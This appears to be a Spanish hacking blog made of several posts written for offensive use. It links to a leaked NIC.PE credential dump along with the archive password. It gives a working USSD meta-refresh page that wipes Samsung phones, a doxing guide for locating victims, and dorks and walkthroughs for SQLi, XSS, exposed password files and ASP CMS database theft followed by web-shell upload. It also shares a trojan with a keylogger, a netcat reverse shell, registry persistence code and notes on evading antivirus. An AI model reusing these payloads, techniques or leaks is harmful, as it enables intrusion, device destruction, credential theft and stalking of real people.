Dominios peruanos (.pe y .com.pe) hackeados 

207116 dominios fueron hackeados por el grupo anonymous LULSEC. Los hackers publicaron el archivo sql que contenía todos los usuarios, emails y contraseñas de los clientes de NIC.PE, dicho página es la única que ofrece dominios peruanos, de ahí que todo fueran hackeados. La razón fue los excesivos precios por dichos dominios.

El archivo .sql en cuestión lo podéis encontrar aquí:

https://anonfiles.com/file/e14504f5033d2a53457af667b686340f

pass del rar: lulzsecperu

2-3 horas despues de la publicación del archivo otro hacker , "@passfile" empezó a subir archivos a pastebin con las contraseñas ya descifradas.contraseñas ya descifradas de los dominios.

1- http://pastebin.com/MZCaqsTF

2- http://pastebin.com/ss8eq9XL

3- http://pastebin.com/w6EyKqEY

4- http://pastebin.com/YGnhph3G

5- http://pastebin.com/C5MtCfGT

6- http://pastebin.com/estdmhYz

7- http://pastebin.com/fepS7g3r

8- http://pastebin.com/vLVV2sn3

9- http://www.pastedump.com/paste/2786

  

Explotando USSD de android

Hoy les traigo el remote USSD code execution de android. ¿USSD? ¿Que es eso? Para quien no lo sepa los códigos USSD son códigos que se encuentran en todos los teléfonos y son capaces de realizar acciones, como por ejemplo darnos información. Dependiendo de nuestro SO, nuestra compañía telefónica o la marca de nuestro terminal tendremos unos códigos diferentes. Podemos saber nuestro IMEI (el IMEI es nuestro numero internacional de identificación del móvil) llamando al *#06#. 

Si lo probáis podréis comprobar que no nos ha echo falta llamar. Simplemente al poner el ultimo # se ha ejecutado el USSD. Esta es un de las claves de la vulnerabilidad.

Ahora vamos a ver un código "mas gracioso", que nos hace un 
hard-reset. *2767*3855# Es un código presente en los samsung, si tenéis uno os recomiendo que no lo probéis ;)

Como habréis visto, simplemente con el teléfono de alguien en mano podemos borrar todos sus archivos y dejarlo con los valores de fabrica. Pero no es lo que realmente queremos, queremos hacerlo remotamente, sin tener que tener el teléfono en nuestra mano.

Empezaremos por crearnos un host web (os recomiendo usar 
000webhost). Añadiremos un nuevo documento llamado index.html lo editamos y ponemos lo siguiente:


<html> 
 <head>
  <title>
   Vulnerabilidad USSD
  </title>
  <meta http-equiv="Refresh" content="0;url=tel:*%2306%23"> 
 </head>
<html>

Dentro del head hemos añadido un meta que nos redirige a la dirección tel:*%2306%23 (que es lo mismo que *#06#). Aquí es donde se encuentra el problema autentico. Desde tel: podemos ejecutar cualquier código USSD. Guardamos la página, la subimos a nuestro host y desde nuestro navegador del móvil accedemos a ella. El resultado es el mismo que introduciendo el código directamente desde el móvil. Ahora podréis comprobar el gran potencial de la vulnerabilidad y los graves efectos que esta puede tener. Si en vez de *%2306%23 ponemos *2767*3855%23 y mandamos el enlace a alguien se producirá automáticamente un hard-reset en su dispositivo solo por haber abierto una página.

Hay muchas maneras de propagar nuestra página maliciosa, una de ellas es mediante el código QR. Podemos crear uno desde la siguiente página web:

http://www.codigos-qr.com/generador-de-codigos-qr/    

 

Introducimos la url de nuestra página y le damos a generar código QR.


Android ya ha parcheado la vulnerabilidad, por lo que se recomienda actualizar a la última versión. 


Salu2 anónimo

Sacando información de alguien Doxing

En este post veremos una serie de técnicas para obtener información de alguien, o también llamado "doxing". Internet esta completamente presente en nuestras vidas tanto es así que la información que podemos encontrar de alguien en la red es increíble. 

Empezaremos por la obtención de la ip. Esto nos servirá para conocer su localización aproximada, su compañía telefónica, si navega a trabes de proxy, que navegador utiliza y cual es su SO, ademas podríamos ver que puertos tiene abiertos y la manera de explotarlos, pero en este tuto nos limitaremos a obtener información.

Para saber la ip de alguien remotamente voy a utilizar dos de las técnicas mas comunes. La primera quizás la conozcáis, consiste en ver la ip de alguien que nos ha mandado un correo.

Para gmail:

1-Abrimos el correo que queramos.

2-Le damos a la flecha que se encuentra a la derecha del mail.

3-Se nos desplegara un menú y seleccionamos "Mostrar original". 

4-Buscamos donde pone "Received:from", justo al lado tendría que   aparecer.

Para hotmail:

Mismos pasos pero pondrá "Ver código fuente del correo"

Esta es una de las maneras mas comunes, pero hay otra mas efectiva y no tan conocida. Para esta técnica necesitaremos un poco de ingeniería social. Utilizaremos la siguiente herramienta:

http://whatstheirip.com/

1-Introducimos nuestro mail y le daremos a get link (es donde recibiremos el correo con la ip).

2-Enviaremos a nuestra victima uno de los dos links que aparecen.

3-Una vez la victima entre en el enlace, recibiremos un correo en el que nos mostrara su ip

Ahora que ya tenemos la ip podemos averiguar información sobre ella.

http://ipaddress.com/ip_lookup/

A partir de ahora nos serviremos de nuestro ingenio para obtener información.

Si conocemos su nombre de usuario de alguna cuenta o su apodo podemos buscarlo un google añadiendo un "@" al final. De esta manera podemos conseguir alguna cuenta de correo introducida en algún foro o red social.

Cuando ya tenemos una cuenta de correo la podemos introducir dentro del buscador de facebook y ver si tiene cuenta.

También podemos buscar en twitter añadiendo el apodo junto a la url.

https://twitter.com/apodo

De esta manera podremos ver su cuenta sin necesidad de registrarse. 

Ahora vamos a ver una interesante web de imágenes. En esta web al introducir la URL o subir una imagen podemos ver en que sitios se encuentra esa imagen.

http://www.tineye.com

Lo probamos cogiendo cualquier imagen y este es el resultado:

Tenemos 40 resultados de 2.1809 billones de imágenes escaneadas. Simplemente utilizando la foto de perfil de facebook o de un foro podemos ver en que otros sitios se encuentra la imagen.

Sin duda la manera mas efectiva para conseguir información sobre alguien son las páginas blancas. Una vez tenemos la ip averiguamos la provincia donde vive y una vez ya tenemos su nombre y apellido obtenidos por el facebook los introducimos en las paginas y blancas. Obtendremos su dirección y número de teléfono.

Por ultimo si nuestra victima tiene una página web podemos conseguir su correo o su teléfono utilizando whois.

http://who.is 

Para practicar todo lo aprendido podéis cojer un usuario de un foro y comenzar a sacar información sobre el.

Salu2 anónimo

Neo-Hell EXE joiner v1.0

El pasado día me decidí a crear un joiner. Para todo aquel que no sepa lo que es, un joiner es un programa que une dos o mas archivos en uno mismo y al abrir el archivo final se ejecutan. Sirve mucho a la hora de camuflar virus ya que la persona que lo ejecuta cree que esta ejecutando el programa y no un virus (lo que pasa en realidad es que se ejecutan los dos). En posteriores posts os enseñare a camuflar y a dejar indetectados nuestros virus y para ello utilizaremos esta herramienta entre otras. Esta es la versión 1.0 poco a poco lo iré mejorando con mas opciones y funciones.


Descarga ----> http://www.mediafire.com/?bd99cq1d8r32oom  




Salu2 anónimo

Adiós ACTA!


El pasado viernes 06 de julio se puso fin a lo que podía haber sido el infierno en Internet, el fin de la libertad individual y el control de todas las conexiones.

Con una clara mayoría (478 votos en contra, 39 a favor) el Europarlamento decido que este acuerdo no era el correcto para erradicar la piratería en Internet y la luchar contra las falsificaciones de las grandes marcas. 

El problema y la razón de que ACTA no sea aprobada es que los medicamentos genéricos podrían tener problemas al pasar por las aduanas ya que estarían considerados falsificaciones, es decir los Farmacéuticos no tenían la seguridad de recibir dichos medicamentos.

La lucha contra el ACTA a terminado, anonymous ha ganado, todos hemos ganado, pero recordad que la libertad individual en Internet peligra cada día y hemos de luchar por ello.


                


Salu2 anónimo                  

DESCARGA DE BASE DE DATOS EN PÁGINAS .ASP Y SUBIENDO SHELL


Hoy en inj3ct0r AtT4CKxT3rR0r1ST publica una interesante vulnerabilidad que me ha llamado la atención.


La vuln consiste en la descarga de la base de datos, en la cual podemos encontrar contraseñas, en las cuales aparece la del administrador. Tampoco hay mucho que explicar, así que vamos a verlo.


Con estos D0rks cazamos algún pescadito:


"powered by ASP CMS"


o

"powered by asp content management"

Cuando ya tenemos una que nos gusta simplemente ponemos en la URL

data/acm.mdb si hemos utilizado el D0rk "powered by asp content 
management" o db/acm.mdb si hemos utilizado "powered by ASP CMS".







Automáticamente se nos descargara el archivo que contiene la básede datos

Como os podéis fijar está en un formato un poco extraño .mdb paraabrirlo necesitaremos un programa, el mdb viewer plus. 

http://mdb-viewer-plus.softonic.com/

Cuando ya lo hayamos abierto nos iremos a la pestaña de login y 

aparecerá el usuario en email y la contraseña en mynumber del

admin.

Ahora iremos a la pestaña que pone admin.

Y cuando le demos nos loggeamos.

Ya estamos dentro y veremos el panel de control.

Nos vamos a upload y desde ahí subiremos una shell al server.

Dependiendo de la tecnología de la web utilizaremos diferentes

tipos de shells (.php .asp .jsp .pl ...) en este caso como es 

.asp utilizaremos la siguiente:

http://code.google.com/p/web-malware-collection/source/browse/trunk/Backdoors/ASP/3fexe.txt

Cuando ya la tenemos subida le damos click y nos aparecerá 

el menú de la shell:

Nos vamos a HardDisk[C:].

Y ya está, como podéis observar tenemos control total sobre la 

máquina remota. Podemos navegar por los diferentes directorios,

descargar archivos, subirlos... 

Salu2 anónimo 

MICRO LOGIN SYSTEM 1.0 LA BASURA DE LA SEGURIDAD

El otro día estuve mirando diferentes exploits y nuevas vulnerabilidades de la página inj3ct0r, últimamente me estoy habituando mas a consultar esta que exploit-db y encontré lo que se puede describir como la basura de la seguridad un falla GORDISIMA presente en este aplicación web.

La aplicación consistía en un simple sistema de login web que almacenaba los passwords en un txt. Y pensareis, ¿Este .txt estará completamente blindado no? Pues NO! se puede acceder a el desde la misma URL. :)  

Ademas por si fuera poco la vulnerabilidad venia con un D0RK, que más podemos pedir:

D0RK: intext:"Micro Login System v 1.0"

Nos ponemos a buscar "pescaditos" y encontramos uno que tiene  buena pinta.

Como podemos observar es un simple sistema de login pero si en la URL ponemos /userpwd.txt nos dará el listado de cuentas.

Bueno como podéis ver nos sale la lista de cuentas emmm, pero, ¿los passwords están en md5? No hay problema desde havij podemos crackearlos o desde cualquier web de md5 crack.

Ahora que ya tenemos el pass simplemente nos logeamos para comprobar que funciona.

Vamos ha analizar mas a fondo la vuln: 

Check user existance 
 $pfile = fopen("userpwd.txt","a+"); 
    rewind($pfile);

 If everything is OK -> store user data
    if ($errorText == ''){
  // Secure password string
  $userpass = md5($pass1);      
     
  fwrite($pfile, "\r\n$user:$userpass");  
  
    }

Como podemos ver el código es muy simple, al principio nos crear el userpwd.txt, despues de introducir los datos encripta el pass en md5 y añade con fwrite el usuario y el pass a userpwd.txt

Si queréis mas info la podéis encontrar en:

http://www.1337day.com/exploits/18307

Salu2 anónimo

XSS Persistente en FlexCMS 3.2.1


Ayer exploit-db publicó una vuln en CMS flex anterior a la versión 3.2.1


XSS persistente?


Si, hasta ahora habíamos visto XSS inyectando por la URL o por las cookies, pero el persistente se queda guardado! Es decir, podemos editar la pagina donde este la vuln y cualquiera que entre la vera. Vamos a verlo:


Para esta vuln he echo un pequeño dork, ya que en exploit-db no salía ninguno:


"Powered By FlexCMS" inurl:index.php/register.html


Tendremos una página como esta le daremos a registration:

Nos registramos y una vez registrados nos loggeamos:

Ahora le daremos a Edit Profile y en display name pondremos nuestro XSS <script>alert(/hacked/)</script>:

Le damos a guardar y ya esta cada vez que alguien entre en la página verá esto:

Como somos hackers éticos nos ponemos en contacto con el admin:

Si queréis mas info (aunque no la hay XD) aquí esta exploit-db:


http://www.exploit-db.com/exploits/18608/ 




Salu2 anónimo

TR0j4neo detectado por el avast?


Hoy como de costumbre me he puesto a trabajar con el TR0j4neo he agregado un par de cosas mas como captura de pantalla y ejecutar archivos. Pero el caso es que la versión que publiqué el otro día la 5.6 estaba detectada por mi avast! Porque? si hace un par de días no lo detectaba! Lo vi claro, cuando lo subí a virustotal se quedó en una base de datos y el avast lo cogió. El caso es que he compilado la nueva versión, con los cambios que he echo y no lo detecta, esta claro que no hay que subirlo a virustotal. 


He reanalizado la v5.6 y ahora lo detectan 16/43, cuatro mas que antes. Entre ellos el avast y el McAfee


https://www.virustotal.com/file/eadd0389aafc49025d7a2153d50882051eba5504cce33aeb49ac90c06caf3a43/analysis/1331402288/

PHP Address Book 6.2.12 Multiple security vulnerabilities

Hoy Stefan Schurtz publica en exploit-db una serie de vulnerabilidades en el PHP adress book 6.2.12.

Las vulnerabilidades son SQLi y XSS.

SQL-Injection: http://[target]/addressbook/edit.php?id=[sql-injection] http://[target]/addressbook/vcard.php?id=[sql-injection] XSS: http://[target]/addressbook/preferences.php?from=XSS http://[target]/addressbook/index.php?group=XSS D0rks: inurl:addressbook/vcard.php?id= inurl:addressbook/edit.php?id=

SQLI Online Shop LeKommerce

El pasado 4 de marzo exploit-db publicó un SQli que me pareció bastante interesante ya que habían un gran numero de páginas vulnerables, aquí va el dork:

inurl:secc.php?id=

Funciona perfectamente con Havij 

Y una de las cosas mas interesantes que he visto es que las contraseñas no están en MD5, es decir, no están protegidas!

Sin duda hay que darle un gran aplauso al creador!

Mas info del SQLi:

http://www.exploit-db.com/exploits/18569/

TR0j4neo v5.6 source code vb

Bueno últimamente he estado trabajando en un troyano en visual basic 6. Me dio bastantes problemas a la hora de realizar las conexiones pero aquí esta:

De momento tiene pocas funciones, poco poco iré añadiendo mas:


-Abrir CD 
-Cerrar CD
-Abrir Página (google.com)
-Mandar error
-Apagar pc
-Keylogger


Y la mas interesante


-Shell remota!!




Estuve mirando muchísimos tutoriales y información, pero al final di con la solución. Usé el sistema netcat para obtener la shell


Para todos los que no sepan lo que es aquí va un tuto:


http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html

El netcat se encuentra en la carpeta del servidor del troyano, cuando se ejecuta el trojan se copia el netcat en system32 y cada vez que en mi cliente le doy a shell remota el server abre ese netcat y se conecta a mi pc que estara en modo escucha. 


Vamos a verlo:

Una vez estemos conectados le daremos a shell remota:

Y ya estamos dentro! 


La pega es que de momento solo admite una conexión, esto ya lo iremos solucionando.


En cuanto a los antivirus es detectado por 11/43


No es detectado ni por Avast, ni por AVG, ni por McAfee, ni por Panda ni por NOD32.


Aquí los resultados en virustotal:


https://www.virustotal.com/file/eadd0389aafc49025d7a2153d50882051eba5504cce33aeb49ac90c06caf3a43/analysis/1331224288/

También tiene NO-ip, para que no tengas que abrirlo cada vez que pones el troyano, aunque aun esta en pruebas, no se si funciona del todo bien.


Bueno sin enrollarme mas aquí dejo el source code y los .exe que he compilado, ademas de un pequeño curso para troyanos en VB:




http://www.mediafire.com/?52qpigol82rsy3i




Nota:


Al servidor le faltan un par de cosas, como agregarse al registro para iniciarse con windows y copiarse en otra carpeta, también le falta que el netcat se copie en system32.


Aquí va el code que teneis que añadir (falta lo del netcat):





FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\system32\" & "ddlr32" & ".exe"




Shell ("cmd.exe /c Reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v ddlr32.exe /d C:\WINDOWS\system32\ddlr32.exe"), vbHide

ANONYMOUS EN LOS PREMIOS GOYA!

 

El pasado domingo en la 26 edición de los premios goya, anonymous se hizo notar como ya estaba anunciando. 

No solo se limitaron a repartir papeles y protestar en la calle, sino que se colaron dentro:

                                   

Aparte un espontáneo se coló también, el equipo de seguridad no debía de tener muy buen día la verdad XD.

Aquí la noticia con mas detalle en el país:

http://cultura.elpais.com/cultura/2012/02/19/actualidad/1329679373_236612.html 


Salu2 anónimo